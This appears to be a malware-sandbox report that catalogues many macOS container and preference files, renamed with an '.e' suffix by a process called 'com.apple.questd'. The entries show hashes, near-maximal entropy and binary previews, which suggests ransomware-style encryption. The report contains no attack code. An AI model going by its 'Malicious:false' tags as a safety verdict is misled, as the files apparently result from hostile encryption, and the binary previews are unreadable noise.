                                                                                                    SHA-512:A4A6627BACBD01C99AADA9791375A3C49FB1796410933174A2D36300ABC8CBF38DA59755260F9122DBE8A543FCD1C381CE9746CA68E0A4A3512076F52175A1E4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+.......F.[b................{.,....|..d.g........{.#.P.mu...}}.bRW8............d..nyo.gj..:g%...r{v.E2....L..72...$Q..i..@0..'..R....72...$..72...$....~..@.q.:.XG...72...$..l1.......R.b#..wwK=..?..Z.,..]...*:....4.T"Q....>.F.-.Q.3:.=^xk.t......O..,?..X.*....@../..p.......\.u.c....7...72...$..l1....7uT0|:...Z)Sr...m.....y\.....O....fz.......o.M....q....V...).`A..fQ......&.o.....?3R.$..U.w..$..#..Iw2.7..+Q.3Soe...F"...)Z76o..*......8..R,I..3.G...E.37.'T...s.(.#3...A~~.. M;*......8P...<.`.......m.d...!...6..d..........N..=.m.].._...!.`..Q.^....3p..}.RiPZ.T.;h.F...Dl..n_.0+.w...zsZ...".......S....R..c.<. .5....2.e".C..V...V....N.g...p....G...q.@....1.0`..G....@.....q.@....4.......O........q.@..nB.U|.}3.....=.l{G`-.Q....j..M`..s.v.ID. ..8...d..V,...%4.a.p.jZ.xx`..o. ......a.|....Em.%M.Rr..S..P......._..bC....|.. ..B....`D.?.......b...X....S..x........].A=....n.<..t..=......qJ&%P...!P.bb$.........w...<w....D
                                                                                                    /Users/ben/Library/Containers/com.apple.CloudDocs.MobileDocumentsFileProvider/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):30883
                                                                                                    Entropy (8bit):7.964015155354353
                                                                                                    Encrypted:false
                                                                                                    MD5:DC3D7A72F0CE8853E69C5EB60A326D5A
                                                                                                    SHA1:AE699FE6C97763A5A982C3BB38C1D740E10405B6
                                                                                                    SHA-256:AC221FF35678D7046C13391739CE53FB527AD3EB4B0FFEC762D1E348CA1D3C12
                                                                                                    SHA-512:A2F5B222F5E21A683C713930730B97176D09229B16EDAAFB3F064697C1DD3BA041AC1F3B92D2D46D5FC38D3CE87507F05603AED5338332ECB6367BF0074FFF4E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+..ETkh.....@....... .z.K+...I......%..Wv.".h..u..0l...#......].........b.f...{..\.s9[|..=......X...2.....t;.Vp...,........3.S.lw.`;.Vp...,;.Vp...,.....ah.w....(..;.Vp...,...d...y........Rp.!ig].2.|).......t.Y...S..j.{q....g.v.....6..(cF....S.2._..,......Z.y.4c.....Z.{.~}.:)su.....x;.Vp...,...d...y.........)...i.NNU..P3./l...G.....?...Y..zs.]v%..`:( .`..:.H..O.h.PW..d.......G&...8H5V.....Q.{.)hZN.....\.|w.],q..a.%.....@..a;...:....e.D..Ke...kD...o.\.|w.],9..|}..i.......i..RgP...[..(.u.[X!.... ..}.].=.X{.Ir.3.q..4.t.[g...N2w9fbS.G.].....<...."....... U..pZB.....yW.[M..c,,.Z.q....k.........h.m.|.........(..uW.....5.7...........(.I......3...9...6......(.?1.Nj.3..|..>.$?../....jF7X?,....d.D.@`9Yv.I_V....../.).'j/.,{:........h.G... ^.i.u'..y..........Ew.........e..4....|.. .......P../.U..9..'GV.n9..k......Lk......................B..[........&.H......!.C2........:.K.8t...9.7.w.t.h].....=f.6H%..fs..=L.9.H....
                                                                                                    /Users/ben/Library/Containers/com.apple.CloudPhotosConfiguration/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):32371
                                                                                                    Entropy (8bit):7.96169555448934
                                                                                                    Encrypted:false
                                                                                                    MD5:E3C9F7A686BE9BBF2808914B6B7807B4
                                                                                                    SHA1:B049E458C922DC748C1EAF35408B0C913DE86C7A
                                                                                                    SHA-256:2D1ACD1C6C8E1456AFF6ABE09AB89EAE7928E316CE4A9BD1DC138A403B59C721
                                                                                                    SHA-512:C1735444255D96312D7A710C1157D6E19BE4A89B026ACBDCCE5A8909586B7ED93E8BE1A3EE9B87DB569E699D938A58ADDCB7AD7FDBB6B2198B4C4C1709AD9B1B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+.....I.X.6L.s...H.#.....V+..l..Y....}....`"..>.s..7.....),..!..#._}.[.'...J.....\.s9[|..=.a%W...c..D....<JG.`.3..\K.C....{....*.6.G.`.3..\G.`.3..\.....ah.w....(..G.`.3..\".H..<.F.....t0.&r,1.P.B5.X7J......t.Y..6E...6..,g....o...,..j~q@.......k.3K.i.s.M..O."'.....N.Yw.)z3kgG:.....:.G.`.3..\".H..<.F.....t0.P..^.......G.r..V..O.f..Ry.m.......r.7....s..:>...aJ.YkiS.B.......q..AL.T8&.,....#W.........%.o....."..b?.........=.........._...W..;J}.m>..XK` ...."..b/.....M.@.O.......(....{VOJ......TP.0W=F.t.!...$..znij`..9e...FDP..j.^d.?.1.f..9.vK.A..."........rQ&T.YFd.J...[.=.W^....I.dR|5_}-......bR..,..56a..O..A[.;..n.../....>Sca..O..A[zB...e.8z..=....a..O..A[.g.q./9X.R.u..T}._....:.T...E3........-.....u;...?..j...G.w..V..... O ..L...HSB..'.GT.C\:Rl.h.w@....,T\I..UH.h.j....|.. ...4........h.3..N8..3.N.....1.U.Lk.....*..tH4...........B..[....W#.0.0.`l....T.C2......M.....;o...g.....y.@.k.t..E...L.b,#.s........e._
                                                                                                    /Users/ben/Library/Containers/com.apple.CloudPhotosConfiguration/Data/Library/Preferences/.com.apple.CloudPhotosConfiguration.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):394
                                                                                                    Entropy (8bit):5.268831361146168
                                                                                                    Encrypted:false
                                                                                                    MD5:92DD88303D6FA314C48455ACC798D9AA
                                                                                                    SHA1:71A65ECC9E6500F925FFFBA4F8FA4F46E01E358B
                                                                                                    SHA-256:397825D4B5A27E6F9BE470B01292E4454DDB5503473E7269419AA117CADA63D1
                                                                                                    SHA-512:C62AAC01F3A335DF8EAC4E605E95AAED184AE12CF3ED469EEC6CF3AFA4F6F3F5953A4B3A56809EF93B38629530FC831C71616992E443E982C4AC6D87AE286C65
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......2....MN.z>...gyLcB....S..<.v%..,#.L.aQs.....h...7....m=..!*A.........{gP.....Y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.DataDetectorsDynamicData/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):50829
                                                                                                    Entropy (8bit):7.9419739055951775
                                                                                                    Encrypted:false
                                                                                                    MD5:9BEDB0C7C3DFD8616B05F5C77A6B8D01
                                                                                                    SHA1:00DB53346489C90B6B1188C1E6CB9C50F47AB7C4
                                                                                                    SHA-256:EFF13F20D9124CF5A03F4B09D3D115341F290315E8E922E67C8BEAC6F832B0BB
                                                                                                    SHA-512:C043A39465BD7CB811D0845BCFAF31A7EB01D33DBE083F01E8B729AA2733F4E6244966128CEBEAB69A637EF2AF1AFB86C8E5FDA6806BBB9AED8237772C19B5BC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+...s......G.dW.q.iY9.x.H..._..0.l.n.A..G..iI./~xJ...,..;...."9........Vh2....F..?.+'..&.*Ord....|9V......Q..#...y....f..?L....G.:...............bM........G.bJ.x..R.m~.P:.:.6.T='.l...H...;...v\.g........G...!.j.v...............\...a...\...a.....$&..;Uk...`..`I.....x............1.....~G.b._.E}..@..<.B..'7.Z...nJ...?........b.kW.;..M.[.......MP#!.;........Gb......Y...*72~...#..Mk..p$..J9..N..Q3v~..g...&.....o..E)q......!....~?........r}....u.........Q.....g..n.......y...5s..).|Oq....wj.i...8..]*..<s....,...>..7g....c{(..\...ty..d*.!......[.m.Q..P.........'...x...,k..u...Pw....N.~7.$.....M)6..cb..~..\.......H.n.1.......E{Y...#....R.Y..:j....Y..M....9....'g..`q..l.RB.....41o.=2d)..p^PM..Mo.q.a+.vC<...>........\S......j\f..0....Un..`3.<>.~p.HE...&t@}.)d...bX...S.....9.\.D.7.W.L%......v0.v..{...-..q3.#d.s..!_.x........iF.;a....B.........FJ.......b....aw...h.1p.9....$[=...D.$9m......r`.-.L..Q.i.h.3....H.n.1..
                                                                                                    /Users/ben/Library/Containers/com.apple.DataDetectorsLocalSources/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):29947
                                                                                                    Entropy (8bit):7.960082540105272
                                                                                                    Encrypted:false
                                                                                                    MD5:51427F80CAA4B9FC6D7E297CEE3B4228
                                                                                                    SHA1:0FC8BFE0640AA163AD7B1A28D58E15177F820EC0
                                                                                                    SHA-256:2869978A3BCDB4ABB69A59130430CA4A5E21CAC25B8B17584747BB97EDA04373
                                                                                                    SHA-512:75D09A351A23F367F2F95EDB649A55F61378E2FCB66E33E340883F03E61B6473A6A6905B2E2AD83584051971FF48776E5B830E7F358FF70366A23732E859BDB8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+..=..8.f..0..A$.Pe..mG~m.3.B...7K..f....iy_..zx.aby..G.8......E..e.z..]. .:.Tx.2.N.=.V.f@..Nj;...-"..p....a.......{).-9...,s.^....a.......a.........)......n....d.a........... ........".JR.;U.A}c....6h..w....@j.1^...........E..........1.R..'.....9..E.8......`\.....".>.t..... .-Lb_\.a........... ........".J....(O0...4^n..#.I.zR.u.&7.>.K..[...]N.......WokStm......r.G..5pY.6.....X).%A.HK........|..u$!...".l#.....dQ.`..*...i7..9........P.$.e}n..y...5...[...0N..dQ.`..T&....L...P...;S.........z..'..w.%.O_.m.?:Z....eb.d...k..J+.........!.>'S.J..#....1u...."..........(...ij.b..S....!C5.....T=..ty.,.}.P.....8 4..#..t..WQ!......O..8..PX...SS.@:g!......O.e....[.T|.....$!......O'.cw2....*...s0]..K.X.e.M......+...*C.......V.......=.+.l9{.>5.|8.....`.Ei.7..ol?...n...>K$........:.Cv9.....X......|.. ..^.......d...'J_..^F1J.o.P.....>....>.@Y....a..o..g.nt.$....S.......Ux...g,c...[....$}..T.m.-.%..6w......./.+.).'...iBl
                                                                                                    /Users/ben/Library/Containers/com.apple.Home/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):26795
                                                                                                    Entropy (8bit):7.983561722091503
                                                                                                    Encrypted:false
                                                                                                    MD5:5674EE670E3CBF4F4A83D79E3C89642A
                                                                                                    SHA1:84C22E11E92482E44124153B1E652DB9B9CF8672
                                                                                                    SHA-256:1EB9F745C492D9DC4BE74B0F8F26E75E8AF8EB42FFCAB9DAF5C4BF740D1C09C5
                                                                                                    SHA-512:74891DDF773537637954619C1751FDBBC4AAD4990E85FED352B28D02106A6406CD5F7661BED2C8EC7071A51614F06A7C809F6EEB325F972FB922A22D4A195EAE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..j...z.R.;.jF....sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0P.+X..&...%...z..d>.....co...B...l.N>..:oa.."..?.......^z.;w....l.;-$...F..H.RV....!.....{..u`...>v..T.!........T......Y.......89.xt=...E&..l..........8.......8.YX_./..s_....zm.......8.o;..S..._T.t..,.lK,...f.F...h-......_.u...D.p...`...2.^.0..J.#....]..6b+.Px..8.I..$.Bx:|.......O[....x c......[.......8.o;..S....%..+'.>^V..k........eu...".....-.0......|.02>?....V...!..u._ .J{.!......*.....4v' .#.c...!.....C..1_.... .6...n*U_.9..ZT..`..1.../..r.......P....e.....g.!..$..]......./j.......l..Z........R..I.5.. 3.~..J>...-N..........].]..*(.G.X.@....*9>.T.+;...:].5.....1....c.x_q;..(W....TO.P...7y..S..*?.fd....1..'~rz...y.......8K...SV#..E...b$DJP.>4.......U..%AE...b$DJ.@o..s....r..K.GE...b$DJw.r..pE..h`.<.<.../z..'.R..Z.>.B.b...z..u..X...I..v.R...<..1."...:...X..U\,.-7...V..c....Q|.Bo...d..>-..?k...."S....|.. .a.1...........u.0../YI...S.....}.l..H.h....t.3<(.W.C.v.D.... .b...C..%...D\...de.....f....!....~+....w.
                                                                                                    /Users/ben/Library/Containers/com.apple.InputMethodKit.TextReplacementService/Data/Library/Preferences/.group.com.apple.TextReplacementService.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):618
                                                                                                    Entropy (8bit):6.440192794690661
                                                                                                    Encrypted:false
                                                                                                    MD5:E8594F31C0E98A24F4C332A3AA16C2A4
                                                                                                    SHA1:D864C548041BDFEB5D3C04D9E32A6083A68CA1E1
                                                                                                    SHA-256:1088D66868BA761B4E7B0E2B5A538EB79C1388B4A7390B4AFEF0E812A4383DCE
                                                                                                    SHA-512:46AFB447AC675E4702F9C86AF901A34B82CF4D906D0D1BF0769BCADE37FB9E7222BE59F5BF0854AA61F2EADC0354EFE658BB0731BCFAE1740CABC1229229D3C9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....m.~.Y.[o>....u3.lp.........G.G..s\L..bzwo|...DkQs..P..}<d....!R..9l..k.]......UKG...q:.>..OH.OZX.$!..P..TY6.C-...9k.......d. ....H@c.l.[zX......`.4Ud..\.... ...#0..B2.C..[B..K..xod..vk.............}.xK;- ..9-.[WH.LX0.e.(..3.O..t...F.+..3..W.....-...J.....N.67.c.-...H....~,7....Q.c.8.3..........P....=..9................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.MailCacheDelete/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):30987
                                                                                                    Entropy (8bit):7.966963225414519
                                                                                                    Encrypted:false
                                                                                                    MD5:B0079FD2FAA7925CF62405C8C848878A
                                                                                                    SHA1:B46F9054D872AA72640373809FF1149121EEB7C0
                                                                                                    SHA-256:289BFC93C616A78332CA93942CA23CF905C18FBF5E404764028F07CB4F4BE0A5
                                                                                                    SHA-512:F5E7FC94CF92E0DE36930A2909227CD1E9459D102BDAD15378477F51B54D745036FCBFE78006DE477C46E3AC7CC443A77825A129E3F26BFED29A3D163D163220
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+......e,....:.....:..(.Gw.....t~._X>.5....F....i~...U.W.z.....1Y.w........}.[._+C..[Kzu.~H1.....==.G....\d;.!SG3.y. #S.......9....;.!SG3.y;.!SG3.y.n..4\. !Z.k*.v,;.!SG3.y.X...M.5..*r..6....M.M&<..;.....w....@j.<~.(.j. ......ck..s....=,.y.....|L..}...Z.....t.'..d.[...K(..8>.3.....}.;.!SG3.y.X...M.5..*r..6.d.\._6...z.!....v.P..Y.B.....".1e....p0.l. .Q........w.......x....*../..m#....=..8.w..`.6.w.oW?WH.(......b..kM.j4v...9B.0Y.X..mW.\PC=Z/..pG.<.HN...5...I.b..kM.j'...X.NW....u=I(.4...Fj..YR:...'Pe=d../.r^g-B....BM=..l..WQ.KA.....F.]...;.lE..**...+..0"...........G4..s-b..{R........5...C.....K1...e..^j......?..F ... .i..;....+.....?..F ..l...}...,d.D..Z..?..F ..".....{S......D0..p.i..%..=......!. u......%...C.>.k..wv.8@I...d....c.Z.d.8.,..t.Y.7.......t.......<s..fnL...3.&....|.. ".......%...(....]1..a......^0.=T.P....b....I...b..'...O.%@.?A....(s....0;I...s1........I...j.Xq....{../..p..SU..Y....;..9.v..,.
                                                                                                    /Users/ben/Library/Containers/com.apple.Maps/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):36940
                                                                                                    Entropy (8bit):7.970347896403368
                                                                                                    Encrypted:false
                                                                                                    MD5:612EBD39A48270D2D00DA32C4DCAD9FE
                                                                                                    SHA1:F02BB0555334856EF7DE44AC28B1B1D04F2163AF
                                                                                                    SHA-256:E25C73D1C52CC82DE678C132A5EF1EBE9A0D47F98A1E90482D27FA96A511D9D3
                                                                                                    SHA-512:6BE47128AE39E88C51C5E54D989B18FCC85445509D7EBCD49D8010DEC30E85F2D2CF2868BDD36983E172282C04A7E9247D2ED18074369908B21E29CFBACA105A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..j...z.R.;.jF....sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0P.+X..&...%...z...A}..B...~.Z.Ta.......S..V.>..Rrz..2/.......]W.....4.E.z2Z.........}#H..(.'..aJ........ .H.hOF5y..h.c.6..*.......p...V..N3D......*.......*.....,Y....h.YLf.......*.....b+....4.zJl\h.6..W...cW./...yr...F..r..$,<..x........4'..{....b.'...l.............XC..(v.G..."J....-....".`..zS...*.....b+....4.1h.e...\..D.P....s..Z....:...Gca.e.MC!.@.t.da..t....k:..).Z...q.....d$..N..:sc..g..L=...*../s.w.....5..K2.BG.y...h.....L.d.nL.g....[V...".y.C3F..[.*"M?....+1.<.......@D.7..-.!'...E-.i...!2 >.{..Uw..=+).yC".........@D+...Grj^t.,..B.{n.d!...s..L\.BiA.c@.....[...E..{....b+.3%.....H....R.T..;[...Yt.?9..B.;G5....7...8>."......a..).".........p..........CX>hL...*..@z.r1._D...../..*S....@XA=Q..n..W.H.~..r.*..@;!....a...u.8T.p.U'.*..@;!.[...[-..=I.J3s.E.*..@;!.u.u....#...T.. .9N..........|!.>1..B..a...B......ID.jXp.?s.........x...h=.Az.m....i.n.....X.Bb.2!..!!.+&$J..........|.. .FR.L_..D../...1.LC..A5-........
                                                                                                    /Users/ben/Library/Containers/com.apple.Maps/Data/Library/Maps/.Bookmarks.synced.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.Maps/Data/Library/Maps/.GeoBookmarks.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):402
                                                                                                    Entropy (8bit):5.285769520495027
                                                                                                    Encrypted:false
                                                                                                    MD5:7C4057BFA4D09A75BEB7BF54CE2B60FD
                                                                                                    SHA1:1DB2BD7C82DF9EBBB2F145DE3F072194FD88E6E5
                                                                                                    SHA-256:5B3E3A09B1F9A91C9E0B2D3A895BF94F6A23B93EC4609F6E5DD33681CAF0E8F8
                                                                                                    SHA-512:D329DFC9315EAD35F08F291E9ADC1A7145DA36E5856207CEA28AD5E1CC2836613A6C7C82A9FC6BA6AFD7C151116C7AD6432C3F066E8572DD87E69CA1A9220232
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...N......_B...5...P&6.......q*........G(,h.q..........M2........p..............t....'...a.a................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.Maps/Data/Library/Maps/.GeoHistory.mapsdata.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):394
                                                                                                    Entropy (8bit):5.282397295074965
                                                                                                    Encrypted:false
                                                                                                    MD5:07F4F86E16898850F38471E2067FC5C5
                                                                                                    SHA1:93610FECF7AD1F6786309CBCAF9F9EDAB15EC5E4
                                                                                                    SHA-256:901BF02B3FB91F0FBDFB28B23AA56D2D5AAD520C299F8080D689421497CB64A5
                                                                                                    SHA-512:D5D45C6CDE4941FFD2C0D6B77459DE7EC61E3D26A62185EE4C3FE81F917122B03420BF6E5FDA96C8EDE5F22FC5D9B4CBF03F66F3C16125FF0EF1B16A73840AEC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.......h......9al...N...A...,.....8C.W...g......3*h...7...I+.....0.........N%/.....Y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.Maps/Data/Library/Preferences/.com.apple.Maps.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1114
                                                                                                    Entropy (8bit):7.277079400207337
                                                                                                    Encrypted:false
                                                                                                    MD5:EDF1BAC90B45265C8245DC70C9658D48
                                                                                                    SHA1:D13DD5C4B9389B8669A0D3DA7765259C28B5BAFE
                                                                                                    SHA-256:EFD625BA4B16725031D125B3EA910BE941758BADF1EFA996A13DD19B72282752
                                                                                                    SHA-512:FFCEF56F59CD7B579226AF5AE0E0D6BCC1D69389DA552B52141846839BCFB68E15FC94C25FEE1034D1B8A4EE9A0AA37948E70E77CA6EBDFF90280AD0D7EE0B93
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..$Z.:/...v~...dK...NnG.`~..\..&.Z-.?U..[.....fV.....v.-'.?.(G.2..G<.....SZ..2.c#<...C...)..f...>.y..q.....2..A.e$W.pE..)......@.V.m-,..#r.J.....X../..pL$..P.s{w.-....2zK{l.]D.....c.E@.NY....h.i.T..0...s.FO..b.-%aq...........]......E.Y.6Q...z...>l..B.A.._a`..!.h).....i..6...L9...u......p..!y.EV.zK=.<V.D......&S...k..a...(....Z....2...W....h..K.F......6.}j.i.....ln.@;Yf.....'.+.M(.....v.*ym..........SL..s.@..c......H.ubgGX.......\.......$.I|.`u...w_./......o...0.[. ..D(.&....-...sq..TZ[/.._.y>. .y.^...r....b..."0.+m..-'....=3.[............5.;..{.*....>..m|......d...........A}. ...^...5..5..m)9.. .!d.+Go...fsf..v..x. 6'm....G...l..o.%..%.....81J...........'....q.9UFqKTm>k...\,0..x,n...m..Z^F..}5M.h........}Wa.0...._....:k.f..u..'.C...S......\=...Ee(.2...sa..O..#..x.ba.{.[.$tb...............lP..)................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...................................
                                                                                                    /Users/ben/Library/Containers/com.apple.Maps/Data/Library/SyncedPreferences/.com.apple.Maps-com.apple.MapsSupport.bookmarks.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):450
                                                                                                    Entropy (8bit):5.62496884585649
                                                                                                    Encrypted:false
                                                                                                    MD5:DE657937799CAF1E16EC18EB969F5750
                                                                                                    SHA1:B66FA93E59941DC65A5B830C949B4EEA83C04101
                                                                                                    SHA-256:20463CD950DB564227140A84F0913421A26CCA59DD63F58174156BA03799FECA
                                                                                                    SHA-512:EB4DC84746D408E536BA850FB88C7AA813B2CC71CE42CF73E594614649DFAE485D609DB339B7C73D0FB511C6000E0AB0A5A66057240D3CA63CD4059EDFAB09D5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..k.......l.=9../....N.A.1( .. ........U.A.j...iv.%@...pYf......... ..G.p.'..~T...v7..Y.;TeZ........l.@|O}....|.. e....'Lf........'.'u.v.:..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.Maps/Data/Library/SyncedPreferences/.com.apple.Maps-com.apple.MapsSupport.history.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):450
                                                                                                    Entropy (8bit):5.652938256171711
                                                                                                    Encrypted:false
                                                                                                    MD5:E52D911979EF1DD0DFAE37E1529A77BB
                                                                                                    SHA1:0419FC34C3741205FBE3FC2C9F904004E41673BD
                                                                                                    SHA-256:2BF325305A6F2880DB9A1F90D970E6C4C05E7708691D240416B12522CA63C906
                                                                                                    SHA-512:2C20A74476D1F54A6158A8B06C7D5CE98D7BA73AD6CADCAE9DA4692D94573CE1C7A13CBC5D24B57394CFE6DCB907CD6B8B2E9CC6323BEC7E3FD74A8BF4A6956B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..k.......l.=9../....N.A.1( .. ........U.A.j...iv.%@...pYf......... ..G.p.'..~T...:.#.c..<eZ........l.@|O}....|.. e....'Lf.............#....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.MediaLibraryService/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):24891
                                                                                                    Entropy (8bit):7.951657471580781
                                                                                                    Encrypted:false
                                                                                                    MD5:16744C8F437073EAC840D177B73CE77D
                                                                                                    SHA1:7D9CFE2EC01E65037A8A5BD58047B02F857CD41C
                                                                                                    SHA-256:4D7831731768697BE44B4547BD7D769A293919FBFE4F4D6E151C118AEDE2F46D
                                                                                                    SHA-512:E5CA711958F732086BCD396C0F8B425010D053DD86E7AD2AFB3EBDC5896D0BBFE1C082522A82766D2A2324D385B014CBE34B0CE4341846C1D0E246B2AAE1C83B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+...C.)3-.k.|.J....6.......>..x..{N+...:..d.....V _...{.........7.....W...........d...........)j...........\.........T(.'.....Y..7.\.......\........].t.7m..5..g...\............[..0<...$...l..(..0..n..i.9}....S..s..3gq.~.....L.X5k0.l...-g....3..u.hjV...-..==Q.&......^...n.]..?[...tT.\............[..0<...$.....~.LC@(\.0.v...6...k1...I.ob..7L.w..q......v...Dcw~....*...b.<..'..i(...G;.....z...Z....e....$u...9......f...0.-...5I....f...0w......jQ3..wX7ks.*....}Z.W.0........y....M.,..3'....t7.8L.B..=......4.G....\v..h.......".......|mzvK?\.Ll.hX..`iA{.sv(."..r.C..$."...ZZ.........!...g...X[...Bl.........../..I.....F.2.............a#f.e?......}N.....<...[X.H....H&..fa.nS1..iI$S......H.....V.$...(..f....:.+. ZG..N..jf........D..H.....H.Uw....|.. a9e......v.hB.A...~.~A..%90..9_...{.U.?..oQ.....N.-.e....i.A...F+.h4....E..g..i.%.Z..|.L..U'...I!T.Obq....v.)..zU.WP.)...p..H>..K..|.).L3u4 ..U.UHd\...A)4.............]
                                                                                                    /Users/ben/Library/Containers/com.apple.Notes.HTMLConverter/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):46044
                                                                                                    Entropy (8bit):7.93816196444284
                                                                                                    Encrypted:false
                                                                                                    MD5:EC2DD8F0373A2EDD14749B4805951407
                                                                                                    SHA1:E98D57F58FBED6C40A34B3310923B026F7DC40B6
                                                                                                    SHA-256:03B740CCF957C4416561EEB7912923E84F0C53B95BBCD8447066C1D673F14B0B
                                                                                                    SHA-512:6495BA640B65B78865735747B3BC37EEFE0A628E36E4BAC6D0D684572E730CDC7B6F14FB050D9340FF37FA7F83D9261785ECAE4324F800210B728C5A9DB1F2BD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
